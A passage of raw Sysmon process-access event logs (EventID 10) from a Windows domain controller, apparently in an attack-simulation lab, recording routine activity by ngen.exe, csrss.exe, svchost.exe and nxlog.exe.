07:00:55.308","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-00109E660A00}","TargetProcessId":"4704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.308\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EC-5F25-0000-00109E660A00}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.308","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EC-5F25-0000-00109E660A00}","TargetProcessId":"4704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.324\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010436E0B00}\r\nTargetProcessId: 4704\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.324","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010436E0B00}","TargetProcessId":"4704","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.418\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CC710B00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.418","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CC710B00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.418\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CC710B00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.418","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CC710B00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.418\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CC710B00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.418","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CC710B00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.996\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CD750B00}\r\nTargetProcessId: 744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:55.996","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CD750B00}","TargetProcessId":"744","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:55.996\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CD750B00}\r\nTargetProcessId: 744\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 